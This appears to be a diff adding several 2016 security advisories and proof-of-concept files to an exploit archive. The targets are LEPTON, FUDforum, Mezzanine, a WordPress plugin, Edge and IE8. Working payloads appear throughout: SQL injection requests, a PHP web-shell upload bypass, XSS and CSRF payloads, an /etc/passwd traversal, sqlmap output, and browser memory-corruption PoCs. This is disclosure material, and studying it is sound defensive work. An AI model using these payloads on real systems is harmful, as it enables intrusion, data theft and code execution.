en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()&
visibility=public&submit=Add
Blind or Error-based SQL Injection: Add Droplet
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&
leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=
f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool=
droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute=
'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&
Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&
Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

80
platforms/php/webapps/40801.txt Executable file
View file

@ -0,0 +1,80 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.
3. Details
Upload of file with dangerous type
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=
099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid=
8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data;
boundary=---------------------------38397165016927337851258279296
Content-Length: 613 -----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="action" media_upload
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="current_dir"
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png <?
php passthru($_GET['x']);
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="submit" Upload File(s)
-----------------------------38397165016927337851258279296-- http://localhost/
LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

109
platforms/php/webapps/40802.txt Executable file
View file

@ -0,0 +1,109 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: XSS, Login CSRF
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.
3. Details
XSS 1: Via Filename in Private Message
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The filename of attached images in private messages is vulnerable
to persistent XSS.
Proof of Concept:
Send a PM to a user. Add an attachment, where the filename is: '"><img src=no
onerror=alert(1)>.jpg When the recipient views the PM, the injected code will
be executed.
XSS 2: Via Filename in Forum Posts
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.
Proof of Concept:
Create a new forum post. Add an attachment, where the filename is: '"><img src=
no onerror=alert(1)>.jpg When viewing the post the injected code will be
executed.
XSS 3: Via Signature in User Profile
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.
Proof of Concept:
Visit http://localhost/fudforum/index.php?t=register as signature, use '"></
textarea><img src=no onerror=alert(1)> The injected code is either executed
when the user themselves edits their profile - which may be exploited via login
CSRF - or when an admin visits the edit profile page located here: http://
localhost/fudforum/index.php?t=register&mod_id=6&&SQ=
1a85a858f326ec6602cb6d78d698f60a
Login CSRF
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.
Proof of Concept:
<html> <body> <form action="http://localhost/fudforum/index.php?t=login" method
="POST"> <input type="hidden" name="login" value="admin" /> <input type=
"hidden" name="password" value="admin" /> <input type="hidden" name="SQ" value=
"0" /> <input type="hidden" name="adm" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

58
platforms/php/webapps/40803.txt Executable file
View file

@ -0,0 +1,58 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: LFI
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.
Admin credentials are required.
3. Details
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.
Proof of Concept:
http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=
4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

126
platforms/php/webapps/40804.txt Executable file
View file

@ -0,0 +1,126 @@
# Exploit Title: Olimometer Plugin for WordPress Sql Injection
# Date: 14/11/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info@tad.bg
# Website: http://tad.bg <https://tad.bg/en/>
# Category: Web Application Exploits
# Tested on: Debian 8
1 - Description
# Vulnerable parameter: olimometer_id=
Parameter: olimometer_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: olimometer_id=1 AND 6227=6227
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: olimometer_id=1 AND SLEEP(5)
Using GET SQL Method with the "olimometer_id" parameter, we were able to
get the database name from the EXAMPLE.COM website . By further running
SQL Map using different arguments, we would be able to get the complete
database, including usernames and passwords if there are such.
2. Proof of Concept
Using the website EXAMPLE.COM for example, we can fire up sqlmap and set
the full path to the vulnerable parameter:
root@kali:~# sqlmap -u
http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_
id=1
--dbs --threads=5 --random-agent --no-cast
---
Parameter: olimometer_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: olimometer_id=1 AND 6227=6227
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: olimometer_id=1 AND SLEEP(5)
---
[11:14:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] fetching database names
[11:14:21] [INFO] fetching number of databases
[11:14:21] [INFO] retrieved:
[11:14:21] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:14:21] [WARNING] (case) time-based comparison requires larger
statistical model, please wait.............................. (done)
[11:14:26] [WARNING] it is very important to not stress the network
adapter during usage of time-based payloads to prevent potential disruptions
[11:14:26] [ERROR] unable to retrieve the number of databases
[11:14:26] [INFO] falling back to current database
[11:14:26] [INFO] fetching current database
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved:
[11:14:28] [INFO] heuristics detected web page charset 'ascii'
14
[11:15:26] [INFO] retrieved: *****_wrdp1
available databases [1]:
[*] *****_wrdp1
We can see that we have successfully discovered one available database
with the name: "*****_wrdp1"
3. Type of vulnerability:
An SQL Injection vulnerability in Olimometer allows attackers to read
arbitrary data from the database.
4. Exploitation vector:
The url parameter 'olimometer_id=' of the
/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is
vulnerable to SQLI.
5. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.
6. Impact:
Critical
7. Software/Product name:
Olimometer Plugin for WordPress
8. Affected versions:
<= 2.56
9. Fixed in version:
Not fixed at the date of submitting that exploit.
10. Vendor:
oshingler
11. CVE number:
Not existing
--
Ivan Todorov | Иван Тодоров
TAD GROUP | ТАД ГРУП
CEO | Изпълнителен Директор
www.tad.bg | +359 877 123456
Самоков 28А, офис 6.2 | 1000 София | България
Samokov 28А, office 6.2 | 1000 Sofia | Bulgaria

80
platforms/python/webapps/40799.txt Executable file
View file

@ -0,0 +1,80 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Mezzanine 4.2.0
Fixed in: 4.2.1
Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website: http://mezzanine.jupo.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Mezzanine is an open source CMS written in python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.
3. Details
XSS 1: Persistent XSS via Name in Comments
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.
Proof of Concept:
Leave a comment, as author name use '"><img src=no onerror=alert(1)> To trigger
the payload, view the comment overview in the admin backend: http://
localhost:8000/admin/generic/threadedcomment
XSS 2: Persistent XSS via HTML file upload
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N
Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.
Proof of Concept:
Visit the media manager and upload a .html file: http://localhost:8000/admin/
media-library/upload/?ot=desc&o=date As uploaded files are stored inside the
web root, it can now be accessed, thus executing the JavaScript code it
contains: http://localhost:8000/static/media/uploads/xss.html
4. Solution
To mitigate this issue please upgrade at least to version 4.2.1:
https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

98
platforms/windows/dos/40793.html Executable file
View file

@ -0,0 +1,98 @@
<!--
Source: http://www.security-assessment.com/files/documents/advisory/edge_chakra_mem_corruption.pdf
Name: Microsoft Edge Scripting Engine Memory Corruption Vulnerability (MS16-129)
CVE: CVE-2016-7202
Vendor Website: http://www.microsoft.com/
Date Released: 09/11/2016
Affected Software: Microsoft Windows 10, Microsoft Windows Server 2016
Researchers: Scott Bell
Description
A memory corruption vulnerability was identified in the Microsoft Edge Chakra JavaScript engine which could
allow a malicious user to remotely execute arbitrary code on a vulnerable users machine, in the context of the
current user.
Exploitation
Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can
generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like this
are often hosted on legitimate websites which have been compromised by other means.
The following table shows some cursory debug information:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00040001 ebx=01b1e760 ecx=00000012 edx=00000006 esi=00000000 edi=03f60000
eip=6a714bea esp=0328fa80 ebp=0328fab0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
jscript9!Recycler::ScanObject+0x23:
6a714bea 8b37 mov esi,dword ptr [edi] ds:0023:03f60000=????????
2:046> k
ChildEBP RetAddr
0328fab0 6a589768 jscript9!Recycler::ScanObject+0x23
0328facc 6a58973a jscript9!Recycler::TryMarkBigBlockList+0x22
0328faf0 6a589d83 jscript9!Recycler::ScanArena+0x7a
0328fb24 6a585f4c jscript9!Recycler::BackgroundFindRoots+0x8e
0328fb34 6a561263 jscript9!Recycler::DoBackgroundWork+0x103
0328fb60 6a6b162c jscript9!Recycler::ThreadProc+0xd1
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\msvcrt.dll -
0328fb98 775c1287 jscript9!Recycler::StaticThreadProc+0x1c
WARNING: Stack unwind information not available. Following frames may be wrong.
0328fbd0 775c1328 msvcrt!itow_s+0x4c
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\kernel32.dll -
0328fbd8 7793ef1c msvcrt!endthreadex+0x6c
0328fbe4 777e3648 kernel32!BaseThreadInitThunk+0x12
0328fc24 777e361b ntdll!__RtlUserThreadStart+0x70
0328fc3c 00000000 ntdll!_RtlUserThreadStart+0x1b
The following proof of concept code can be used to reproduce the vulnerability:
-->
<html>
<META http-equiv="Expires" content="Tue, 20 Aug 1996 14:25:27 GMT">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-5">
<body>
<script>try{
for(var z in "a") a1.set(a1, '' );
Array.prototype.sort.call(a1, 'a', a1)
a1 = this;
a2 = [];
a1 = a2.concat(a1.a1);
var a1 = new Iterator(a1);
a1.add(a1);
for (let zzz = 0; zzz < 117; ++zzz) {a1.unshift(a2, a1);}
a1.reverse();
Array.prototype.reverse.call(a1);
a1.splice(1, 10);
}catch(e){};</script>
</body>
</html>
<!--
Solution
M
icrosoft validated this security issue and issued a patch (MS16-129) to remedy it.
Security-Assessment.com recommends applying the patch which has been made available via Windows Update.
About Security-Assessment.com
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high
quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of
the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify
and responsibly publish vulnerabilities in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release of whitepapers and
presentations related to new security research.
For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info@security-assessment.com
-->

89
platforms/windows/dos/40797.html Executable file
View file

@ -0,0 +1,89 @@
<!--
Source: http://blog.skylined.nl/20161118002.html
Synopsis
A specially crafted web-page can cause an integer underflow in Microsoft Edge. This causes CText­Extractor::Get­Block­Text to read data outside of the bounds of a memory block.
Known affected software, attack vectors and mitigations
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
Repro.html
<!DOCTYPE html>
<style>
*::first-letter{ border: 0; }
*{ white-space: pre-line; }
</style>
<body>
A<script>alert();</script>&#x­D;&#x­D;B
</body>
Description
Though I did not investigate thoroughly, I did find out the following:
The root cause appears to be an integer underflow in a 32-bit variable used in CText­Extractor..Get­Block­Text as an index to read a WCHAR in a string buffer. This index is decreased once too often and becomes -1, or a very large positive number depending on how it is used.
This does not result in a crash on 32-bit systems, as an integer wrap causes the code to read one WCHAR before the start of the buffer, which is normally also in allocated memory.
On 64-bit systems, the 32-bit -1 value is interpreted as 0x­FFFFFFFF, a very large positive value. As this is an index into a WCHAR string, it gets multiplied by two and added to the start of the buffer to find the location of a WCHAR to read. This causes the OOB read to be around 8Gb (!!) beyond the address at which the buffer is allocated.
The crash happens in code that appears to be rendering the web-page, which does not immediately offer an obvious way of extracting information using this bug.
Exploit
This is where it gets interesting, as the OOB read happens approximately 0x2`00000000 bytes after the address at which the buffer is allocated. This presents us with a problem: how to store some information that we'd be interested in reading at such a large offset from the original allocation?
As one might come to expect from me, I used a heap spray. But it needed to be a special kind of heap spray as I did not want to actually have to allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I developed a heap spray that uses significantly less RAM than a traditional heap spray does; in practice probably about 33% in most cases, but theoretically much more in ideal situations. I've been meaning to blog about it, but never found the time to do so until today: you can read all about it here.
That said, I have not actually looked at whether it is possible to exfiltrate useful information using this bug. However, I did write a Proof-of-Concept that attempts to make sure something is allocated in the area where the OOB read happens. This Po­C uses these heap spray tricks to spray the heap while minimizing memory use. The Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb distance from the buffer (up to ~10Gb to be sure). When you load the Po­C in a 64-bit version of Edge, you may notice that, unlike the original repro, it will not crash Edge (even though it does trigger the issues): the heap spray has allocated the memory that the out-of-bounds read accesses, and this prevents an access violation exception. Refreshing the page is likely to screw up the precise allocation process needed and will probably cause a crash.
This proves that it is theoretically possible to allocate information at the address used by the code. All that is left is prove that the information read by the code can be exfiltrated somehow, and you have a working exploit. This is left as an exercises to the reader.
-->
<!DOCTYPE html>
<style>
*::first-letter{ border: 0; }
*{ white-space: pre-line; }
</style>
<body>
A<script>
var ai­Allocation­Sizes = [ // max address ------. .---- RAM allocated
-0x4000, // 4000 4000 4000
0x1000, // | 1000 5000 5000
-0x5000, // -4000 | 5000 a000 6000
0x5000, // | | 5000 f000 b000
-0x7000, // | -5000 | 7000 16000 d000
0x6000, // | | | 6000 1c000 13000
-0x8000, // | | -7000 | 8000 24000 14000 (5.3Gb)
];
var ao­Heap = [],
o­To­Be­Freed;
ai­Allocation­Sizes.for­Each(function (i­Allocation­Size) {
if (i­Allocation­Size < 0 && o­To­Be­Freed) {
console.log("-0x" + o­To­Be­Freed.byte­Length.to­String(16));
o­To­Be­Freed = null; // Free the heap block that was queued to be freed.
Collect­Garbage();
}
var u­Allocation­Size = Math.abs(i­Allocation­Size) * 0x10000 - 1;
console.log("+0x" + u­Allocation­Size.to­String(16));
var o­Array­Buffer = new Array­Buffer(u­Allocation­Size);
if (i­Allocation­Size < 0) {
o­To­Be­Freed = o­Array­Buffer; // Schedule this to be freed
} else {
//ao­Heap.push(o­Array­Buffer);
}
});
</script>&#x­D;&#x­D;B
</body>
<!--
Time-line
June 2016: This vulnerability was found through fuzzing.
June 2016: This vulnerability was submitted to ZDI and i­Defense.
July 2016: This vulnerability was acquired by ZDI.
September 2016: This vulnerability was addressed by Microsoft in MS16-104.
November 2016: Details of this issue are released.
-->

49
platforms/windows/dos/40798.html Executable file
View file

@ -0,0 +1,49 @@
<!--
Source: http://blog.skylined.nl/20161116001.html
Synopsis
A specially crafted web-page can cause the Javascript engine of Microsoft Internet Explorer 8 to free memory used for a string. The code will keep a reference to the string and can be forced to reuse it when compiling a regular expression.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
-->
<!DOCTYPE html>
<html>
<script>
// This Po­C attempts to exploit a use-after-free bug in Microsoft Internet
// Explorer 8.
// See http://blog.skylined.nl/20161116001.html for details.
var r=new Reg­Exp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
"A".replace(r, function (){
// Force OLEAUT32 to free the string
for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
// Reuse the freed memory
r.compile();
});
// This work by Sky­Lined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
</html>
<!--
Description
Recompiling the regular expression pattern during a replace can cause the code to reuse a freed string, but only if the string is freed from the cache by allocating and freeing a number of strings of certain size, as explained by Alexander Sotirov in his Heap Feng-Shui presentation.
Exploit
Exploitation was not investigated.
Time-line
March 2015: This vulnerability was found through fuzzing.
March 2015: This vulnerability was submitted to ZDI.
April 2015: This vulnerability was acquired by ZDI.
October 2015: Microsoft addressed this issue in MS15-018.
November 2016: Details of this issue are released.
-->